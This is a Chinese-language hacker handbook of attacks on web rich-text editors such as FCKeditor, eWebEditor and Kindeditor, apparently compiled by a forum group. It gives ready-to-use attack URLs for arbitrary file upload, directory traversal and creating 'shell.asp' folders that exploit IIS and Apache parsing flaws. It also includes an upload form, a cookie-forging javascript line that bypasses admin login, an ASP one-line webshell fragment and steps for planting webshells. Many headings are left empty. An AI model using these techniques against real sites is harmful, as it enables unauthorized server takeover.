简介  #2014年8月21日 
 最初的手册版本,是由北洋贱队 的各位朋友收集整理。时隔4年,我们再次整理了这些文件。目的是希望这种传统能延续下去。我们相信:星星之火可以燎原。希望大家能多提建议,完善这份手册。
 #2010年某月某日 
 创建这样一个文档是为了能够使得众多需要得到帮助的人们,在她们最为困苦之时找到为自己点亮的那盏明灯,虽然这将揭示了某个寂静黑夜下一群躁动不安的人群.他们在享受快感,享受H4ck W0r|d带给他们的一切.
 作为收集整理此文的修订者,我怀着无比深邃的怨念参考了诸多资料才使得此物最终诞生,在此感谢整理过程中所有施舍帮助于我的人们.愿他们幸福快乐,虎年如意! 
 非常希望各位能够与我联系,一并完成本文的创作。
 本手册更新地址  http://navisec.it/编辑器漏洞手册/
 文章目录  编号 名称 最后修订时间 1 FCKeditor 2010年 2 eWebEditor 2010年 3 Cute Editor 2010年 4 Webhtmleditor 2010年 5 Kindeditor 2010年 6 Freetextbox 2010年 7 Msn editor 2010年 
 FCKeditor  FCKeditor 编辑器页  FCKeditor/_samples/default.html
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
fckeditor/editor/filemanager/connectors/test.htmlFCKeditor 查看编辑器版本  FCKeditor/_whatsnew.htmlFCKeditor V2.43 版本 
 FCKeditor/editor/filemanager/browser/default/connectors/php/config.phpFCKeditor V2.6.6版本 
 FCKeditor/editor/filemanager/connectors/asp/config.phpFCKeditor 匿名上传文件  影响版本:非优化/精简版本的FCKeditor
 FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.htmlFCKeditor 查看文件上传路径  FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/XML页面中第二行 url=/xxx的部分就是默认基准上传路径
 Note:
 FCKeditor被动限制策略所导致的过滤不严问题  影响版本: FCKeditor x.x <= FCKeditor v2.4.3
 Fckeditor 2.0 <= 2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件.来突破[未测试]。而在apache下,因为”Apache文件名解析缺陷漏洞”也可以利用之,详见”附录A”
 另建议其他上传漏洞中定义TYPE变量时使用File类别来上传文件,根据FCKeditor的代码,其限制最为狭隘。
 攻击利用:
 允许其他任何后缀上传利用2003路径解析漏洞上传木马  影响版本: 附录Bbin.asp如此一般的目录,再在此目录中上传文件即可被脚本解释器以相应脚本权限执行。
 fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp强制建立shell.asp目录:
 FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684or
 FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.aspNote:[`Sn4k3!]这个我也不知道咯,有些时候,手动不行,代码就是能成功,囧。
 FCKeditor PHP上传任意文件漏洞  影响版本: FCKeditor 2.2 <= FCKeditor 2.4.2
 <form id="frmUpload" enctype="multipart/form-data"
action="http://navisec.it/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>Note:如想尝试v2.2版漏洞,则修改Type=任意值 即可,但注意,如果换回使用Media则必须大写首字母M,否则LINUX下,FCKeditor会对文件目录进行文件名校验,不会上传成功的。
 FCKeditor 暴路径漏洞  影响版本:aspx版FCKeditor
 FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/1.aspFCKeditor 文件上传“.”变“_”下划线的绕过方法  影响版本: FCKeditor => 2.4.x
 提交1.php+空格 就可以绕过去所有的,※不过空格只支持win系统 *nix是不支持的[1.php和1.php+空格是2个不同的文件]
 Note:http://pstgroup.blogspot.com/2007/05/tipsfckeditor.html
 FCKeditor 文件上传“.”变“_”下划线的绕过方法(二)  影响版本:=>2.4.x的最新版已修补
 如果通过上面的步骤进行测试没有成功,可能有以下几方面的原因:
 FCKeditor 新闻组件遍历目录漏洞  影响版本:Aspx与JSP版FCKeditor
 /browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp 根据返回的XML信息可以查看网站所有的目录。
 /browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
 
/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
 
TYPE自定义变量任意上传文件漏洞  
影响版本: 较早版本
 
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp打开这个地址就可以上传任何类型的文件了,Shell上传到的默认位置是:http://navisec.it/UserFiles/all/1.asp Type=all 这个变量是自定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.
 
比如输入:
 
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp网马就可以传到网站的根目录下.
 
Note:如找不到默认上传文件夹可检查此文件: 
 
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ eWebEditor  
eWebEditor 基础知识  
默认后台地址:
 
默认数据库路径:
 
[PATH]/db/ewebeditor.mdb
[PATH]/db/db.mdb             
[PATH]/db/%23ewebeditor.mdb   默认密码:
 
点击“样式管理”—可以选择新增样式,或者修改一个非系统样式,将其中图片控件所允许的上传类型后面加上|asp、|asa、|aaspsp或|cer,只要是服务器允许执行的脚本类型即可,点击“提交”并设置工具栏—将“插入图片”控件添加上。而后—预览此样式,点击插入图片,上传WEBSHELL,在“代码”模式中查看上传文件的路径。
 
2、当数据库被管理员修改为asp、asa后缀的时候,可以插一句话木马服务端进入数据库,然后一句话木马客户端连接拿下webshell
 
eWebEditor 可下载数据库,但密文解不开  
脆弱描述:
 
eWebEditor遍历目录漏洞  
脆弱描述:
 
eWebEditor 5.2 列目录漏洞  
脆弱描述:
 
利用eWebEditor session欺骗漏洞,进入后台  
脆弱描述:
 
eWebEditor asp版 2.1.6 上传漏洞  
攻击利用:(请修改action字段为指定网址)
 
eWebEditor 2.7.0 注入漏洞  
攻击利用:
 
eWebEditor2.8.0最终版删除任意文件漏洞  
脆弱描述:
 
eWebEditor PHP/ASP 后台通杀漏洞  
影响版本: PHP ≥ 3.0~3.8与asp 2.8版也通用,或许低版本也可以,有待测试。
 
javascript:alert(document.cookie=”adminuser=”+escape(“admin”));
 
而后三次回车,清空浏览器的URL,现在输入一些平常访问不到的文件如../ewebeditor/admin/default.php,就会直接进去。
 
eWebEditor for php任意文件上传漏洞  
影响版本:ewebeditor php v3.8 or older version
 
eWebEditor JSP版漏洞  
大同小异,我在本文档不想多说了,因为没环境 测试,网上垃圾场那么大,不好排查。用JSP编辑器的我觉得eweb会比FCKeditor份额少得多。
 
eWebEditor 2.8 商业版插一句话木马  
影响版本:=>2.8 商业版1":eval request("h")’
 
注意:可能因为转载的关系,代码会变掉,最好本地调试好代码再提交。
 
eWebEditorNet upload.aspx 上传漏洞(WebEditorNet)  
脆弱描述:
 
southidceditor(一般使用v2.8.0版eWeb核心)  
http://navisec.it/admin/southidceditor/datas/southidceditor.mdb
 
或许上面针对eWebEditor v2.8以下低版本的小动作可以用到这上面来.貌似没多少动作?☹
 
Cute Editor  
Cute Editor在线编辑器本地包含漏洞  
影响版本:
 
Cute Editor Asp.Net版利用iis解析漏洞获得权限  
影响版本:
 
Webhtmleditor  
利用WIN 2003 IIS文件名称解析漏洞获得SHELL  
影响版本:<= Webhtmleditor最终版1.7 (已停止更新)
 
Kindeditor  
利用WIN 2003 IIS文件名称解析漏洞获得SHELL  
影响版本: <= kindeditor 3.2.1(09年8月份发布的最新版)
 
Freetextbox  
Freetextbox遍历目录漏洞  
影响版本:未知
 
Freetextbox Asp.Net版利用IIS解析漏洞获得权限  
影响版本:所有版本
 
Msn editor  
利用WIN 2003 IIS文件名称解析漏洞获得SHELL  
影响版本:未知
 
附录  
附录A – Apache文件名解析缺陷漏洞  
测试环境:apache 2.0.53 winxp,apache 2.0.52 redhat linux
 
1.国外(SSR TEAM)发了多个advisory称Apache’s MIME module (mod_mime)相关漏洞,就是attack.php.rar会被当做php文件执行的漏洞,包括Discuz!那个p11.php.php.php.php.php.php.php.php.php.php.php.php.rar漏洞。
 
2.S4T的superhei在blog上发布了这个apache的小特性,即apache 是从后面开始检查后缀,按最后一个合法后缀执行。其实只要看一下apache的htdocs那些默认安装的index.XX文件就明白了。
 
3.superhei已经说的非常清楚了,可以充分利用在上传漏洞上,我按照普遍允许上传的文件格式测试了一下,列举如下(乱分类勿怪)
 
典型型:rar
 
4.整个漏洞的关键就是apache的”合法后缀”到底是哪些,不是”合法后缀”的都可以被利用。
 
5.测试环境
 
By cloie, in ph4nt0m.net(c) Security.
 
附录B – iis文件夹名,解析漏洞  
安装了iis6的服务器(windows2003),受影响的文件名后缀
 
有.asp .asa .cdx .cer .pl .php .cgi 
 
Windows 2003 Enterprise Edition是微软目前主流的服务器操作系统。 Windows 2003 IIS6 存在着文件解析路径的漏洞,当文件夹名为类似hack.asp的时候(即文件夹名看起来像一个ASP文件的文件名),此时此文件夹下的任何类型的文件(比如.gif,.jpg,.txt等)都可以在IIS中被当做ASP程序来执行。这样黑客即可上传扩展名为jpg或gif之类的看起来像是图片文件的木马文件,通过访问这个文件即可运行木马。如果这些网站中有任何一个文件夹的名字是以 .asp .php .cer .asa .cgi .pl 等结尾,那么放在这些文件夹下面的任何类型的文件都有可能被认为是脚本文件而交给脚本解析器而执行。
 
附录C – iis文件名,解析漏洞  
漏洞描述:
 
Note:(FW) for http://www.cnblogs.com/webserverguard/archive/2009/09/14/1566597.html
 
其他  
Version  
1.3 
 
编辑人员  
北洋贱队@Bbs.SecEye.Org:
 
联系方式  
navisec@163.com
 
本手册原地址: https://docs.google.com/document/d/1w_61xR8U7nmn4Y0CvBHpG1uFIU2ORx69QnqTxQt8Km0/edit?pli=1
 
编辑器漏洞手册 pdf版